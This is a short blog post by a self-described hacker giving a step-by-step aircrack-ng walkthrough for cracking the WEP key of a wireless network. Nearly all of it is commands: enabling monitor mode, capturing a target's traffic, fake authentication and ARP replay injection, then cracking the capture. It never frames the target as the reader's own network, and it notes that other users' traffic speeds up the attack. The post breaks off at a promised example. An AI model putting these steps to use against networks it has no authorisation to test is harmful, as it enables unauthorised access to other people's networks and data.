Freelancer developper and Hacker

WEP Password cracking

Hi ppl… i’m gonna show you how to crack an WEP password of a wireless network
Start backtrack and open the konsole

Code:

airmon-ng start wlan0
airodump-ng mon0

# press ctrl+c to stop the capture and choose one wireless network

Code:

airodump-ng -w [file_name] -c [channel] --bssid [bssid of the network] mon0
# Open another konsole (DO NOT close the current one…)

Code:

aireplay-ng -1 0 -a [bssid] mon0
aireplay-ng -3 -b [bssid] mon0

# Wait until you get more then 100000 #Data
# If the users on the network are using the wireless network a lot it will help you to get the #Data more quickly
Open another console

Code:

aircrack-ng [file_name]

Here is an example how to use aircrack:

Leave a comment